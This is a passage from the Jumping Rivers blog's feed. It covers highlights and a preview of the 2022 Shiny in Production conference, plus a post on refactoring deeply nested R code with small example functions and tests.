&lt;p&gt;&lt;a href="https://twitter.com/jwalton3141" rel="external"&gt;Jack Walton&lt;/a&gt; ran a workshop introducing &lt;em&gt;RStudio Connect&lt;/em&gt; - a hosting platform which makes publishing your content painless and easy. In this workshop Jack demonstrated a few different workflows to host, share, and scale content on RStudio Connect.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Theo Roe talked attendees through &lt;em&gt;Automated Reporting with Quarto&lt;/em&gt; - a new open source publishing system - where he demonstrated how to make a range of outputs including simple documents, presentations, and dashboards.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://twitter.com/nrennie35" rel="external"&gt;Nicola Rennie&lt;/a&gt; taught the &lt;em&gt;Introduction to Tableau&lt;/em&gt; workshop where attendees learnt the basics of Tableau, then published their very own dashboard that they had developed during the workshop.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Jumping Rivers run training courses on all three of these topics, so if you&amp;rsquo;re keen to learn even more or if there was a workshop you missed out on, check out our available &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;training courses&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-shiny-in-production-highlights"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;img src="all.jpg" style="width: 600px; display: block; margin-left: auto; margin-right: auto" alt="Speakers grouped together on stage at the conference. Left to right: Chris Beeley, Mark Sellors, Nic Crane, Colin Fay, Mike Smith, Theo Roe, Caterina Constantinescu, Gareth Burns, Andrew Patterson" /&gt;
&lt;h3 id="session-1"&gt;Session 1&lt;/h3&gt;
&lt;h4 id="colin-fay-thinkr"&gt;&lt;a href="https://twitter.com/_ColinFay" rel="external"&gt;Colin Fay&lt;/a&gt; (ThinkR)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;DESTROY ALL WIDGETS!&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Colin Fay kicked off the conference by sharing his frustrations with some web apps. This included long load times, visual clutter and accessibility issues. He recommended keeping things simple, only using interactivity when necessary and observing new users exploring your app to understand the UX better. Amusingly, the speakers for the rest of the day became very self-conscious of all of their whizzy HTML widgets and kept apologising to Colin.&lt;/p&gt;
&lt;h4 id="caterina-constantinescu-globallogic"&gt;&lt;a href="https://twitter.com/c__constantine" rel="external"&gt;Caterina Constantinescu&lt;/a&gt; (GlobalLogic)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Journey through a landscape of options: Choosing among web app frameworks for your project&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;With so many web app frameworks out there, it can be confusing to know where to start. Caterina gave us a high-level overview of Shiny vs Dash vs Streamlit vs Gradio with an example on a real energy data application. She also recommended a blog by &lt;a href="https://www.datarevenue.com/en-blog/data-dashboarding-streamlit-vs-dash-vs-shiny-vs-voila" rel="external"&gt;Data Revenue&lt;/a&gt; as a good place to start.&lt;/p&gt;
&lt;h3 id="session-2"&gt;Session 2&lt;/h3&gt;
&lt;h4 id="chris-beeley-nhs"&gt;&lt;a href="https://twitter.com/ChrisBeeley" rel="external"&gt;Chris Beeley&lt;/a&gt; (NHS)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Next level Shiny- R, Python, and JavaScript&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&amp;ldquo;Yes, you can do that in Shiny. But don&amp;rsquo;t.&amp;rdquo; Chris kicked off the second session by showing us how you can use other languages such as JavaScript or Python to level-up your Shiny apps. Chris demonstrated how you can combine models you&amp;rsquo;ve built in Python (or JavaScript code you&amp;rsquo;ve written to offload the interactive elements to a user&amp;rsquo;s computer) with Shiny using {reticulate}, {shinyjs}, and {golem}.&lt;/p&gt;
&lt;p&gt;The slides for the talk can be found &lt;a href="https://cdu-data-science-team.github.io/presentations/2022-10-07_shiny-in-production/2022-10-07_shiny-in-production.html#1" rel="external"&gt;online&lt;/a&gt;, and the source code for the slides is available on &lt;a href="https://github.com/CDU-data-science-team/presentations/tree/main/2022-10-07_shiny-in-production" rel="external"&gt;GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="andrew-patterson-jumping-rivers"&gt;&lt;a href="https://twitter.com/A_C_Patt" rel="external"&gt;Andrew Patterson&lt;/a&gt; (Jumping Rivers)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Dockerising a Shiny App&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;In the second talk of the session, Andrew talked about dockerising Shiny apps. He explained what Docker is (a platform for developing and deploying applications), and discussed why you might want to dockerise a Shiny app (and why you might not want to&amp;hellip;). Andrew shared the
&lt;a href="https://gallery-cats.jmpr.io" rel="external"&gt;Which Cat Are You?&lt;/a&gt; app (built by
&lt;a href="https://www.linkedin.com/in/mandy-norrbo/" rel="external"&gt;Mandy Norrbo&lt;/a&gt;) as an example of a Dockerised Shiny app.&lt;/p&gt;
&lt;img src="robot_shiny.png" title="Shiny Robot" alt="Jumping Rivers robot holding a spanner" style="display: block; width: 200px; margin-right: auto; margin-left: auto;" /&gt;
&lt;h3 id="session-3"&gt;Session 3&lt;/h3&gt;
&lt;h4 id="nic-crane-voltron-data--mark-sellors-rstudiodata-orchard"&gt;&lt;a href="https://twitter.com/nic_crane" rel="external"&gt;Nic Crane&lt;/a&gt; (Voltron Data) &amp;amp; &lt;a href="https://twitter.com/sellorm" rel="external"&gt;Mark Sellors&lt;/a&gt; (RStudio/Data Orchard)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Firing an Arrow into the internet of things: combining the power of Arrow, Raspberry Pi &amp;amp; Shiny&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We were seeing double in this tag-team-talk by Nic and Mark, who showed us how
Arrow can be used to analyse larger-than-memory datasets. Nic and Mark
motivated this approach by discussing a real-world IoT problem in which they
used Raspberry Pis to record and analyse data on air quality. On top of this,
Nic and Mark went one step further to explain &lt;em&gt;why&lt;/em&gt; Arrow on S3, and Arrow
and Parquet are so powerful when used in combination.&lt;/p&gt;
&lt;h4 id="theo-roe-jumping-rivers"&gt;Theo Roe (Jumping Rivers)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Expect the Unexpected - {Shiny} &amp;amp; {htmlwidgets}&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Theo closed up session three by recounting a recent project he worked on, in
which a client wished to use interactive Sankey and sunburst diagrams within
Shiny. Although these widgets exist within the D3 framework for JavaScript,
they had yet to be implemented as htmlwidgets in R. Whilst detailing how to
create these widgets, Theo discussed some of the unforeseen technical issues
which arose during this project.&lt;/p&gt;
&lt;h3 id="session-4"&gt;Session 4&lt;/h3&gt;
&lt;h4 id="gareth-burns-exploristics"&gt;&lt;a href="https://twitter.com/GarethBurns4" rel="external"&gt;Gareth Burns&lt;/a&gt; (Exploristics)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Seamlessly integrating Shiny applications into KerusCloud; a cloud-based, clinical trial simulation platform&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Gareth showed us KerusCloud, a cloud-based computing platform developed by Exploristics used to simulate patient populations for clinical trial analysis. Three separate use cases were demonstrated: prototyping, stand-alone applications, as well as embedded applications. You can try it out yourself by visiting the &lt;a href="https://exploristics.com/playground/" rel="external"&gt;KerusCloud Playground&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="mike-smith-pfizer"&gt;&lt;a href="https://twitter.com/MikeKSmith" rel="external"&gt;Mike Smith&lt;/a&gt; (Pfizer)&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Offload data manipulation from your Shiny apps and dashboards using {pins}&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;In his talk, Mike highlighted the benefits of separating out your data importing and pre-processing from your Shiny app using {pins}. Data wrangling steps can instead be run with an automated job, and your app only needs to read in the pinned data, which can significantly reduce the overall complexity and loading time of your app.&lt;/p&gt;
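&lt;p&gt;As a rough sketch of this pattern (not the code from Mike&amp;rsquo;s talk), the example below uses {pins} to write a pre-processed data set in one step and read it back in another. The data, the pin name &lt;code&gt;site_summary&lt;/code&gt; and the temporary board are all assumptions made for illustration; in practice the board would be a shared location that both the scheduled job and the app can reach.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(pins)

# Assumption: a temporary board, used only so the sketch is self-contained.
# A real setup would use a board shared by the job and the app.
board = board_temp()

# --- Scheduled job: do the expensive wrangling once, then pin the result ---
raw_data = data.frame(
  site = c(&amp;#34;a&amp;#34;, &amp;#34;a&amp;#34;, &amp;#34;b&amp;#34;),
  value = c(1, 2, 3)
)
summary_data = aggregate(value ~ site, data = raw_data, FUN = mean)
pin_write(board, summary_data, name = &amp;#34;site_summary&amp;#34;, type = &amp;#34;rds&amp;#34;)

# --- Shiny app: only read the pinned, ready-to-use data ---
site_summary = pin_read(board, &amp;#34;site_summary&amp;#34;)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;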
&lt;h3 id="what-happens-next"&gt;What happens next?&lt;/h3&gt;
&lt;p&gt;We want to say thank you to the &lt;a href="https://www.nicd.org.uk/" rel="external"&gt;National Innovation Centre for Data&lt;/a&gt;, &lt;a href="https://www.ncl.ac.uk/maths-physics/engagement/nusolve/" rel="external"&gt;NU Solve&lt;/a&gt;, and the &lt;a href="https://rss.org.uk/" rel="external"&gt;Royal Statistical Society&lt;/a&gt; who kindly sponsored the event. Thanks also to our speakers who all gave incredibly insightful presentations, and of course to all our attendees who helped make Shiny in Production such a fantastic event!&lt;/p&gt;
&lt;p&gt;We had such a great time running the Shiny in Production conference that we&amp;rsquo;re planning on doing it all again next year! Look out for more details coming soon!&lt;/p&gt;
&lt;img src="NICD_logo.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="NICD logo" /&gt;
&lt;img src="nu-solve-colour.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="NU Solve logo" /&gt;
&lt;img src="royal_statistical_society.jpg" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="RSS logo" /&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-highlights/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Refactoring Russian Doll Code</title><link>https://www.jumpingrivers.com/blog/refactoring-russian-doll-code/</link><pubDate>Thu, 06 Oct 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/refactoring-russian-doll-code/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/refactoring-russian-doll-code/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/refactoring-russian-doll-code/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="refactoring-russian-doll-code"&gt;Refactoring Russian Doll Code&lt;/h2&gt;
&lt;p&gt;Recently, I&amp;rsquo;ve been working with an environmental scientist to refactor a large R package. Let&amp;rsquo;s call her Jane.&lt;/p&gt;
&lt;p&gt;Jane inherited a mess of code, and had to get it working as quickly as possible. She tidied it up as best she could in the time available, but now that the company depended on it, it needed some attention. We referred to it as her &amp;ldquo;Russian Doll code&amp;rdquo; because it had many nested functions, each passing the same giant nested lists back and forth. I could see that it frustrated her every time she had to touch it, as she knew there was a better way to structure the code.&lt;/p&gt;
&lt;p&gt;We booked in some &lt;a href="https://www.jumpingrivers.com/consultancy/r-python-stan-development-support/" rel="external"&gt;1:1 support sessions&lt;/a&gt; and sat down together with the aim of making the code easier to work with.&lt;/p&gt;
&lt;img src="vacuum.png" title="Tidy your code" alt="Jumping Rivers robot using a vacuum cleaner on a pile of code and text." style="display: block; width: 400px; margin-right: auto; margin-left: auto;" /&gt;
&lt;h3 id="define-the-messy-zone"&gt;Define the messy zone&lt;/h3&gt;
&lt;p&gt;You know when you tidy your bedroom, you optimistically pull &lt;em&gt;everything&lt;/em&gt; out onto the floor. A few hours later, the bed is covered and there are piles of clothes everywhere. There&amp;rsquo;s no going back, and you aren&amp;rsquo;t going to be able to sleep on your bed tonight unless you clean everything. (Just me?)&lt;/p&gt;
&lt;p&gt;Throughout the refactoring process, it was essential that we were able to continuously run and test the functionality of the package. But how could we rewrite all of our functions without affecting the functionality of the whole code base?&lt;/p&gt;
&lt;p&gt;We decided to start with the smallest functions, and re-write the main body of the code. However, in order to ensure the higher-level functions still worked, we defined a &lt;em&gt;messy zone&lt;/em&gt; at the start and end of each function. In the top messy zone, we would reassign any function parameters to have better names and structure. In the bottom messy zone, we would ensure that the function return matched the old return. We were then free to completely refactor the main bit of the function, knowing that the inputs and outputs were handled.&lt;/p&gt;
&lt;p&gt;Being explicit about where the mess is &amp;ldquo;allowed&amp;rdquo; let us focus on simplifying and clarifying the internals whilst still ensuring that the higher-level code functioned as expected. It also meant that we didn&amp;rsquo;t have to decide on the structure of the function parameters up front; we could work that out naturally as the code evolved. Finally, it gave us clear markers of where we would need to clean up later, and avoided the issue of forgetting to change parameters everywhere.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;example &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(arg1, arg2) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Messy zone&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; a_better_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; arg1&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;mess&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;ugh
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; helpful_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; arg2&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;what&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;is&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;this
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Refactor the internals&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; useful_result &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; a_better_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; helpful_name
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sensible_name_tibble &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; a_better_name &lt;span style="color:#ff7b72;font-weight:bold"&gt;*&lt;/span&gt; helpful_name
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# Messy zone: rebuild the old nested return structure&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; results &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; results&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;some&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;mess &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; useful_result
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; results&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;another&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;naff&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;list &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sensible_name_tibble
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; results
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="push-the-mess-up-push-it-real-good"&gt;Push the mess up (Push it real good)&lt;/h3&gt;
&lt;p&gt;Once we refactored the main bodies of all the small, inner functions, it was time to clean up the mess we had made earlier. We started by listing the arguments and returns of the inner functions. Once we had decided on sensible names and formats, we changed them all in one go across all functions - clearing the messy zone.&lt;/p&gt;
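&lt;p&gt;As a rough sketch, this is what the toy &lt;code&gt;example()&lt;/code&gt; function from the previous section might look like once its messy zones have been cleared. The argument names and the flat list it returns are illustrative assumptions, not the structure the real package ended up with.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical cleaned-up version of example(): callers now pass
# well-named arguments directly, so both messy zones have gone.
example = function(a_better_name, helpful_name) {
  useful_result = a_better_name + helpful_name
  sensible_name_tibble = a_better_name * helpful_name

  # Return a flat, named list instead of the old nested structure
  list(
    useful_result = useful_result,
    sensible_name_tibble = sensible_name_tibble
  )
}

res = example(a_better_name = 2, helpful_name = 3)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Every function that calls &lt;code&gt;example()&lt;/code&gt; has to switch to the new arguments and return value at the same time, which is why we made these changes in one go.&lt;/p&gt;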
&lt;p&gt;We were then free to move up a level, to the next Russian doll, pushing the mess up. We kept repeating this process, slowly moving up through the layers, from the smallest Russian doll, up until we were at the top of the code base.&lt;/p&gt;
&lt;img src="featured.jpg" title="Russian Dolls" alt="Seven traditional wooden Russian dolls, going from largest on the left to smallest on the right." style="display: block; width: 400px; margin-right: auto; margin-left: auto;" /&gt;
&lt;h3 id="start-with-a-blank-slate"&gt;Start with a blank slate&lt;/h3&gt;
&lt;p&gt;When you&amp;rsquo;re refactoring a function, it can be tempting to copy the old function into a new script, and just start editing. However, the copy-paste method for refactoring can tie you to the style of the old function, making redesign harder. We found that writing the revised functions from scratch forced us to reconsider and challenge every step of the old function. Ask yourself, what is this function actually trying to achieve, and how should we implement it?&lt;/p&gt;
&lt;h3 id="take-time-to-design"&gt;Take time to design&lt;/h3&gt;
&lt;p&gt;Jane and I had one session where we didn&amp;rsquo;t touch any code &lt;em&gt;at all&lt;/em&gt;. We talked, doodled and drew diagrams. You might leave a session like this feeling a little deflated that you didn&amp;rsquo;t achieve anything. However, that session was actually the most valuable. In the following session we made huge progress, because we had already done the hard work of thinking out the design fully. We were able to whizz through the functions, implementing our new design efficiently. We found ourselves constantly referring back to the diagrams to remind ourselves of the design choices we had made.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-refactoring-russian-doll-code"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="a-good-name-goes-a-long-way"&gt;A good name goes a long way&lt;/h3&gt;
&lt;p&gt;We all know that it&amp;rsquo;s important to choose good names for parameters and functions. However, in this project, I was surprised just how much of a difference a good name makes. Sometimes, the &lt;em&gt;only&lt;/em&gt; thing we would change in a function would be the names. Often a simple rename morphed the unintelligible code in front of me into a clear, readable explanation of the approach.&lt;/p&gt;
&lt;h3 id="test-regularly"&gt;Test regularly&lt;/h3&gt;
&lt;p&gt;Things are going to go wrong. You are going to accidentally delete a line of code, or put a bracket in the wrong place. If you ensure that your code is always runnable, you can keep checking that it still works by running your tests. This is particularly important when implementing statistical models, to ensure that numerical results are unaffected by the refactor. In R, the &lt;a href="https://testthat.r-lib.org/" rel="external"&gt;{testthat}&lt;/a&gt; package makes it easy and painless to add package tests. If you&amp;rsquo;re using Git, using continuous integration to run an R package check on every commit takes away the burden of remembering to stop and test.&lt;/p&gt;
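&lt;p&gt;As a minimal sketch of such a check, the test below compares a refactored function against the original on a fixed input. Both &lt;code&gt;old_model()&lt;/code&gt; and &lt;code&gt;new_model()&lt;/code&gt; are hypothetical stand-ins invented for illustration. &lt;code&gt;expect_equal()&lt;/code&gt; compares numbers up to a small tolerance, which suits floating point results.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(testthat)

# Hypothetical original implementation: mean of squares via a loop
old_model = function(x) {
  total = 0
  for (value in x) {
    total = total + value^2
  }
  total / length(x)
}

# Hypothetical refactored implementation: same calculation, vectorised
new_model = function(x) {
  mean(x^2)
}

test_that(&amp;#34;refactored model reproduces the original results&amp;#34;, {
  x = c(1.5, 2.25, 3, 4.75)
  expect_equal(new_model(x), old_model(x))
})
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;While refactoring, it can help to keep the old function around (or to save its outputs) until the new version passes a test like this.&lt;/p&gt;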
&lt;h3 id="why-rather-than-how"&gt;Why rather than How&lt;/h3&gt;
&lt;p&gt;The code was initially what I would call &amp;ldquo;&lt;strong&gt;How&lt;/strong&gt;&amp;rdquo; programming. The different components of the functions were grouped by &lt;em&gt;how&lt;/em&gt; the calculations were computed programmatically rather than &lt;em&gt;why&lt;/em&gt; we were calculating them. This made it hard for someone new to the code to understand what each function did.&lt;/p&gt;
&lt;p&gt;I&amp;rsquo;m not an environmental scientist, so I don&amp;rsquo;t understand all of the science behind Jane&amp;rsquo;s complex model. However, by asking questions about what she was trying to achieve, we re-grouped the different stages of each function in terms of the science, rather than the implementation. Changing the focus of the code from the implementation to the science made it much easier to follow.&lt;/p&gt;
&lt;img src="colab.jpg" title="Collaboration" alt="Cartoon of four people sat around a table, with laptops. One of them is pointing at a projector screen with the python logo on it." style="display: block; width: 400px; margin-right: auto; margin-left: auto;" /&gt;
&lt;h3 id="do-it-with-a-friend"&gt;Do it with a friend&lt;/h3&gt;
&lt;p&gt;Refactoring can be quite daunting. You&amp;rsquo;ve often got lots of moving parts and it can be difficult to hold both the overall design and the small technical details in your head at the same time. Having someone to pair program with you makes this much easier. In our sessions, Jane would &amp;ldquo;drive&amp;rdquo;, coding the finer technical implementations, whilst I was the passenger, observing and challenging her on whether the implementation she was writing fitted in with our grand design. The person helping you doesn&amp;rsquo;t have to understand the code in detail; in fact, sometimes it helps if they don&amp;rsquo;t! It can also be more fun to work collaboratively: we would celebrate together whenever we were able to delete a large chunk of obsolete code.&lt;/p&gt;
&lt;h3 id="wrap-up"&gt;Wrap up&lt;/h3&gt;
&lt;p&gt;Refactoring code properly takes time, and sometimes it can be hard to justify the cost. However, poorly written code is difficult to develop, time consuming to maintain and tends to mask bugs which are hiding in the cobwebs of functions that no-one really understands any more. Hopefully these tips will help the next time you get the chance to refactor some code. Here they are again:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Define the messy zone&lt;/li&gt;
&lt;li&gt;Push the mess up&lt;/li&gt;
&lt;li&gt;Start with a blank slate&lt;/li&gt;
&lt;li&gt;Take time to design&lt;/li&gt;
&lt;li&gt;A good name goes a long way&lt;/li&gt;
&lt;li&gt;Test regularly&lt;/li&gt;
&lt;li&gt;Why rather than How&lt;/li&gt;
&lt;li&gt;Do it with a friend&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/refactoring-russian-doll-code/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production: Coming up</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-coming-up/</link><pubDate>Tue, 04 Oct 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-coming-up/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-coming-up/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-coming-up/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Shiny in Production is just around the corner. We can&amp;rsquo;t wait to welcome you all to Newcastle on Thursday and Friday. Here&amp;rsquo;s a quick round up of what you can expect!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-shiny-in-production-coming-up"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="workshops"&gt;Workshops&lt;/h2&gt;
&lt;p&gt;There are three workshops running in parallel on the day, each given by one of our JR trainers!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Introduction to RStudio Connect&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;RStudio Connect is a hosting platform which makes publishing your Shiny applications, plumber APIs, R Markdown documents and many other content types painless and easy. In this workshop we will demonstrate a few different workflows which allow you to host, share, and scale content on RStudio Connect.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Introduction to Tableau&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Faster and more capable of handling larger datasets than Excel, Tableau is quickly becoming a valuable tool for individuals and organisations who want to leverage their data. It’s more user-friendly and simpler to learn than programming languages, but still allows a high level of customisation. This workshop is designed for people with no prior experience of Tableau, who want to get to grips with the basics of summarising and interactively visualising their data.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Automated Reporting with Quarto&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Quarto is a brand new open source publishing system that allows you to dynamically create static or interactive documents and automatically update reports when data changes. Whether you are hoping to generate HTML, PDF or Microsoft Word like documents, or even slides for a presentation, Quarto caters to your needs. This workshop will demonstrate how to make a range of outputs, from simple documents to presentations and dashboards.&lt;/p&gt;
&lt;h2 id="speakers"&gt;Speakers&lt;/h2&gt;
&lt;p&gt;We have a great line up of speakers coming up - you can read more about their talks in their abstracts which are now live on &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;the website&lt;/a&gt;!&lt;/p&gt;
&lt;p&gt;&lt;img alt="Collage of speakers faces" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/shiny-in-production-coming-up/speaker_collage_updated.png" width="1500"&gt;&lt;/p&gt;
&lt;h2 id="sponsors"&gt;Sponsors&lt;/h2&gt;
&lt;p&gt;A huge thank you to the sponsors of this event: NU Solve; the Royal Statistical Society, who are sponsoring the Drinks Reception; and the National Innovation Centre for Data, who are providing the room hire!&lt;/p&gt;
&lt;img src="NICD_logo.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="NICD logo" /&gt;
&lt;img src="nu-solve-colour.png" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="NU Solve logo" /&gt;
&lt;img src="royal_statistical_society.jpg" style="width: 285px; display: block; margin-left: auto; margin-right: auto" alt="RSS logo" /&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-coming-up/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>API as a package: Testing</title><link>https://www.jumpingrivers.com/blog/api-as-a-package-testing/</link><pubDate>Thu, 29 Sep 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/api-as-a-package-testing/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/api-as-a-package-testing/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/api-as-a-package-testing/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h2 id="introduction"&gt;Introduction&lt;/h2&gt;
&lt;p&gt;This is the final part of our three part series:&lt;/p&gt;
&lt;ul&gt;
